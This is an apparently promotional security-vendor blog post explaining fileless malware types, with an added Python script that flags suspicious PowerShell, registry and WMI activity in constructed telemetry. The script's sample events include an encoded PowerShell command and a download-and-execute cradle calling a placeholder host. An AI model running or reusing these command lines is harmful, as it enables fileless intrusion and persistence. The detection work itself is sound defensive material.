
    Fileless Malware Attacks Are on the Rise, But Don't Worry

    By BUFFERZONE Team, 6/07/2023

    Target: Consumers

    Tags: Fileless Malware, Bypass antivirus, Isolation, CDR

    Fileless malware attacks rose sharply in 2020: WatchGuard reported a 900% increase over the previous year [1]. A more recent study from Aqua Security found a 1,400% increase in 2022 in fileless or memory-based attacks that abuse software, applications and protocols already present on the target [2]. This surge reflects the growing sophistication of attackers and the need for defenses that do not depend on spotting a malicious file.

    What is a fileless attack

    Unlike conventional malware, fileless malware does not rely on dropping an executable file on disk. Instead it runs in the system's memory, inside processes that are already present, which lets it evade signature-based detection that scans files on disk. This is what makes fileless malware so effective: it slips past many antivirus products [3].

    Its ability to stay undetected and to persist makes fileless malware particularly dangerous. A single click on a malicious link or a visit to a compromised website can be enough to infect a system, which is a real challenge for standard endpoint protection [1]. It compromises the system by abusing programs that administrators consider safe and have allowed, such as built-in scripting engines and management tooling. Because nothing is written to disk during infection, fileless malware is harder to identify than traditional malware: disk scans by conventional antivirus tools find nothing to inspect.

    Typically the infection starts when a user, deceived by social engineering, clicks a malicious link or opens an attachment delivered in a phishing email [4]. The malicious code then runs on the system and may move on to other devices.

    A fileless attack is therefore one stage of a longer attack chain. Blocking the initial vectors that trigger it is the most effective way to prevent it.


    There are three primary types of fileless malware attack: memory code injection, manipulation of the Windows registry [4], and abuse of built-in Windows subsystems such as Windows Management Instrumentation (WMI).

    Memory code injection hides malicious code inside the memory of a trusted application, typically by exploiting a vulnerability in software such as Flash, Java or a web browser. The malware then executes inside that legitimate process, so no new process or file appears on the host [4].

    Windows registry manipulation, by contrast, uses a malicious link or file to get a trusted Windows process to write the payload into a registry value and later execute it from there, for example by having an autorun key launch a built-in interpreter that reads and runs the stored script. Once the user has interacted with the link or file, the attacker holds a persistence mechanism that never touches a conventional file, which is why it slips past traditional antivirus software [4]. The third type stores malicious code in WMI's CIM repository, typically as a permanent WMI event subscription whose consumer runs the payload through a legitimate process when a trigger such as system startup fires. The CIM repository is itself saved on disk, but the code is well hidden inside it [5].

    Another characteristic of fileless malware is its abuse of command lines, the argument strings that tell a program what to do; an encoded or obfuscated PowerShell command line is a typical carrier. Because no unusual file is associated with the threat, traditional antivirus software often overlooks it [4].
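    As an added example (not BUFFERZONE code and not from any of the cited sources), the script below shows what hunting for these three patterns looks like on endpoint telemetry: it triages a handful of constructed process-creation and WMI events, shaped loosely like Sysmon records, for encoded or hidden-window PowerShell command lines, download cradles, payloads read back out of the registry, and WMI command-line event consumers. The events, the registry path, the consumer name and the 192.0.2.10 address are all made up for illustration; the base64 blob is a real encoding of the text "IEX (New-Object", so the decoder can be checked against it.

```python
"""Added example: triage constructed Windows telemetry for fileless patterns.
Event shapes loosely follow Sysmon (EventID 1 = process creation,
EventID 20 = WMI event consumer). All records below are constructed."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicators of the "living off the land" command lines fileless malware relies on.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_CRADLE = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitstransfer)")
REGISTRY_PAYLOAD = re.compile(r"(?i)\b(iex|invoke-expression)\b.*\b(get-itemproperty|gp)\b")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
INTERPRETERS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe")

# Constructed sample telemetry (hypothetical; 192.0.2.10 is a documentation address).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -c "IEX (Get-ItemProperty -Path HKCU:\\Software\\Classes\\Foo).Payload"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"EventID": 20, "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')\""},
]


@dataclass
class Finding:
    event_index: int
    technique: str
    reasons: List[str] = field(default_factory=list)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; recover it."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _command_line_reasons(cmd: str) -> List[str]:
    reasons = []
    if ENCODED_FLAG.search(cmd):
        reasons.append("encoded command")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    return reasons


def triage_process_event(idx: int, ev: dict) -> Optional[Finding]:
    cmd = ev.get("CommandLine", "")
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = _command_line_reasons(cmd)
    technique = "command-line abuse"
    if parent in OFFICE_PARENTS:  # a phishing document spawning an interpreter
        reasons.append(f"interpreter spawned by {parent}")
    if REGISTRY_PAYLOAD.search(cmd):  # script pulled out of a registry value
        reasons.append("payload read from registry")
        technique = "registry-resident payload"
    return Finding(idx, technique, reasons) if reasons else None


def triage_wmi_event(idx: int, ev: dict) -> Optional[Finding]:
    """A WMI event consumer whose command runs a script interpreter is the
    classic fileless persistence: the CIM repository holds the payload."""
    if ev.get("EventID") != 20:
        return None
    dest = ev.get("Destination", "")
    reasons = []
    if ev.get("Type") == "Command Line" and any(i in dest.lower() for i in INTERPRETERS):
        reasons.append("CommandLineEventConsumer runs a script interpreter")
    reasons += _command_line_reasons(dest)
    return Finding(idx, "WMI persistence", reasons) if reasons else None


def triage(events) -> List[Finding]:
    findings = []
    for idx, ev in enumerate(events):
        f = triage_process_event(idx, ev) if ev.get("EventID") == 1 else triage_wmi_event(idx, ev)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_index}: {f.technique}: {', '.join(f.reasons)}")
        decoded = decode_encoded_command(SAMPLE_EVENTS[f.event_index].get("CommandLine", ""))
        if decoded:
            print(f"  decoded: {decoded}")
```

    Run as-is, it flags the Word-spawned encoded command, the script read from the registry and the WMI consumer, and leaves the benign directory listing alone. The point is the shape of the logic rather than the particular regexes: none of the indicators depends on a file hash, because in a fileless attack there is no file to hash; what is inspected instead is the behaviour of trusted binaries (who launched them, what arguments they got, what they were told to read).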

    How to stop fileless attacks

    To counter these threats it is vital to keep software updated, especially Microsoft products. Microsoft has hardened recent Windows versions and improved Microsoft Defender to flag abnormal PowerShell activity (for example through the Antimalware Scan Interface and PowerShell script block logging), and Endpoint Detection and Response (EDR) vendors offer detection solutions aimed at these attacks.

    However, detection is complex, and malware authors can test their attacks against these defenses before launching them, so existing security measures can be bypassed. We therefore recommend a zero-trust prevention strategy.

    BUFFERZONE® Safe Workspace™ is a set of preventive tools built on application isolation technology. It includes Safe Browsing, SafeBridge® (with Content Disarm and Reconstruction (CDR) capabilities) and Safe Removable (which prevents USB attacks), all reinforced with clipboard security. A kernel driver establishes the Safe Workspace™ virtual container, effectively splitting the operating system into two distinct zones.

    The first, the trusted zone, has access to the organization's networks and the operating system's files. The second, the untrusted zone, acts as a buffer: applications run there isolated from the trusted zone's memory, files, registry and processes, so code running in the container is kept away from them.

    This approach offers several advantages: low CPU and memory usage, a good user experience, and the ability to work normally inside the virtual container while being shielded from browsing and USB threats.

    BUFFERZONE® is a unique virtual containment solution that leverages six patented technologies. Safe Workspace™ protects against phishing attacks, harmful downloads, and risky email attachments and links (via an Outlook extension). We believe security should be simple and accessible to the user.

    Try us now!

    References:

    [1] WatchGuard Technologies, Inc., New Research: Fileless Malware Attacks Surge by 900% and Cryptominers Make a Comeback, While Ransomware Attacks Decline, GlobeNewswire, 30 March 2021, https://www.globenewswire.com/en/news-release/2021/03/30/2201173/0/en/New-Research-Fileless-Malware-Attacks-Surge-by-900-and-Cryptominers-Make-a-Comeback-While-Ransomware-Attacks-Decline.html

    [2] Michael Hill, Fileless attacks surge as cybercriminals evade cloud security defenses, CSO Online, https://www.csoonline.com/article/643356/fileless-attacks-surge-as-cybercriminals-evade-cloud-security-defenses.html

    [3] Sushil Kumar et al., An emerging threat Fileless malware: a survey and research challenges, Cybersecurity (SpringerOpen), https://cybersecurity.springeropen.com/articles/10.1186/s42400-019-0043-x

    [4] Fortinet, What is Fileless Malware, https://www.fortinet.com/resources/cyberglossary/fileless-malware

    [5] Nick Ismail, Defending against fileless malware, Information Age, https://www.information-age.com/defending-fileless-malware-6282/